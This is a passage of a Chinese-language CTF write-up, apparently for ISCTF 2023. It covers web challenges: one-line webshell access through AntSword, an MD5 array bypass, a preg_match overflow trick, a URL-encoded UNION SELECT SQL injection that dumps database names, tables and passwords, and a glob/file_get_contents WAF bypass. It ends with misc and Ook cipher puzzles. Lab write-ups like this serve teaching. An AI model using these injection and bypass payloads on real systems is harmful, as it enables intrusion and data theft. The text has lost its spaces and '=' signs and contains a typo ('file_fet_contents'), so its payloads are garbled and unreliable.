)
希望看完之后可以对你熟悉ctf比赛以及提高技术水平有所帮助9.where_is_the_flag进⼊靶机标准的⼀句话⽊⻢打开蚁剑添加数据由此可以轻松拿到flag1返回根⽬录⼜能找到flag2最后flag3需要打开虚拟终端echo $FLAG3得到完整flag10.绕进你的心里分析命令⾏get输⼊两个MD5值相等但不同的两个值可以⽤数组的⽅式绕过?hongmeng[0]1shennong[0]2接下来是post输⼊的pan_gustripos函数要求字符串中要包含2023ISCTFpreg_match正则匹配函数 /i 表示不区分⼤⼩写/s 表示字⺟不能让它匹配到ISCTF垃圾数据逃逸⼤量垃圾数据使检测的过程崩溃我在160k字典后⾯加上了2023ISCTF得到flag11.easy_websitesql注⼊显示数据库查询失败说明是闭合⽽且有过滤order变成了der空格也没了⽤url编码%6f代替o绕过or过滤代替空格1%6frderby4#⼆分法继续往下爆字段最后发现字段为1经过测试发现union select也被过滤全部转换为url编码爆schema1%75%6e%69%6f%6e%73%65%6c%65%63%74schema_namefrominf%6frmation_schema.schemata#要让他显示多⾏内容要⽤到groupconcat函数1%75%6e%69%6f%6e%73%65%6c%65%63%74group_concat(schema_name)frominf%6frmation_schema.schemata#找到users的库⾥继续爆tablewhere指定在users的库中1%75%6e%69%6f%6e%73%65%6c%65%63%74group_concat(table_name)frominf%6frmation_schema.tableswheretable_schemausers#爆column1%75%6e%69%6f%6e%73%65%6c%65%63%74group_concat(column_name)frominf%6frmation_schema.columnswheretable_nameuser#在password列⾥找明指 users数据库下的users表and也⽤url编码绕过过滤1%75%6e%69%6f%6e%73%65%6c%65%63%74group_concat(column_name)frominf%6frmation_schema.columnswheretable_schemausersa%6edtable_nameusers#最后看字段内容1%75%6e%69%6f%6e%73%65%6c%65%63%74passw%6frdfromusers.users%23还是⽤groupconcat1%75%6e%69%6f%6e%73%65%6c%65%63%74group_concat(passw%6frd)fromusers.users#得到flag12.wafr找到没被过滤的并且能够读取⽂件的函数var_dump() 显示参数信息/输出内容file_get_contents() 将⽂件读⼊⼀个字符串var_dump(file_get_contents(⽂件名)); file_get_contents将⽂件的内容以字符串的形式返回var_dump再对字符串进⾏输出但是file_get_contents不⽀持通配符那么需要⼀个函数⽀持通配符并且能够返回匹配的flag⽂件路径glob() 返回⼀个包含匹配的指定⽂件名或⽬录的数组可以使⽤通配符glob(/f*)[0] - array[0]flag.txt*通配符匹配f开头的⽂件名postcodevar_dump(file_fet_contents(glob(/f*)[0]))得到flag13.签到题下载后是两张图⽚随便拼接⼀下扫描到蓝鲨信息公众号得到flag14.你说爱我尊嘟假嘟下载后改后缀为zip解压得到⼀个⽂件这是⼀个三元密码查到是Ook密码⽤Ook解码需要转换格式其中Ook.最多把⽂档中的你说爱我全部替换为Ook.经过测试尊嘟替换为Ook!假嘟替换为Ook?https://www.splitbrain.org/services/ookild3l4pXejwPcCwJsPAOq7sJczdRdTsJcCEUsP1Z⽤base64解码这⾥是变种base64使⽤0-9a-zA-Z/ 为填充得到flag有任何问题都可以随时关注私信